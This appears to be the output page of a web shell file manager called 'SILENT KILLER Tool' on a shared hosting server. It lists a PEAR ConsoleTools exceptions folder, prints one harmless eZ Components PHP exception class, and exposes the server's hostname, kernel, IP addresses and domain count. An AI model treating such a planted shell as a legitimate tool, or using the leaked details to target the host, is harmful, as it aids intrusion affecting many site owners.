Current Path: > > opt > > cloudlinux > alt-php54 > root > usr > share > pear > ezc > ConsoleTools > > > exceptions
Operation : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 162.0.232.56 | Your IP: 216.73.216.111 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
argument.php | File | 649 bytes | December 18 2019 11:17:09. | |
argument_already_registered.php | File | 1604 bytes | December 18 2019 11:17:09. | |
argument_mandatory_violation.php | File | 900 bytes | December 18 2019 11:17:09. | |
argument_too_many.php | File | 949 bytes | December 18 2019 11:17:09. | |
argument_type_violation.php | File | 1138 bytes | December 18 2019 11:17:09. | |
dialog_abort.php | File | 694 bytes | December 18 2019 11:17:09. | |
exception.php | File | 427 bytes | December 18 2019 11:17:09. | |
invalid_option_name.php | File | 793 bytes | December 18 2019 11:17:09. | |
invalid_output_target.php | File | 750 bytes | December 18 2019 11:17:09. | |
no_position_stored.php | File | 683 bytes | December 18 2019 11:17:09. | |
no_valid_dialog_result.php | File | 707 bytes | December 18 2019 11:17:09. | |
option.php | File | 640 bytes | December 18 2019 11:17:09. | |
option_already_registered.php | File | 744 bytes | December 18 2019 11:17:09. | |
option_arguments_violation.php | File | 926 bytes | December 18 2019 11:17:09. | |
option_dependency_violation.php | File | 1296 bytes | December 18 2019 11:17:09. | |
option_exclusion_violation.php | File | 1281 bytes | December 18 2019 11:17:09. | |
option_mandatory_violation.php | File | 871 bytes | December 18 2019 11:17:09. | |
option_missing_value.php | File | 901 bytes | December 18 2019 11:17:09. | |
option_no_alias.php | File | 778 bytes | December 18 2019 11:17:09. | |
option_not_exists.php | File | 803 bytes | December 18 2019 11:17:09. | |
option_string_not_wellformed.php | File | 779 bytes | December 18 2019 11:17:09. | |
option_too_many_values.php | File | 886 bytes | December 18 2019 11:17:09. | |
option_type_violation.php | File | 1279 bytes | December 18 2019 11:17:09. |
<?php /** * File containing the ezcConsoleTooManyArgumentsException. * * @package ConsoleTools * @version 1.6.1 * @copyright Copyright (C) 2005-2010 eZ Systems AS. All rights reserved. * @license http://ez.no/licenses/new_bsd New BSD License */ /** * Thrown if only a certain number of arguments were expected, but more were submitted. * This exception can be caught using {@link ezcConsoleOptionException}. * * @package ConsoleTools * @version 1.6.1 */ class ezcConsoleTooManyArgumentsException extends ezcConsoleArgumentException { /** * Creates a new exception object. * * @param array(string) $args Arguments array. * @param int $i Index in the arguments array. * @return void */ public function __construct( $args, $i ) { parent::__construct( "Only " . ( $i - 1 ) . " arguments are expected, but " . ( count( $args ) - 1 ) . " were submitted." ); } } ?>
SILENT KILLER Tool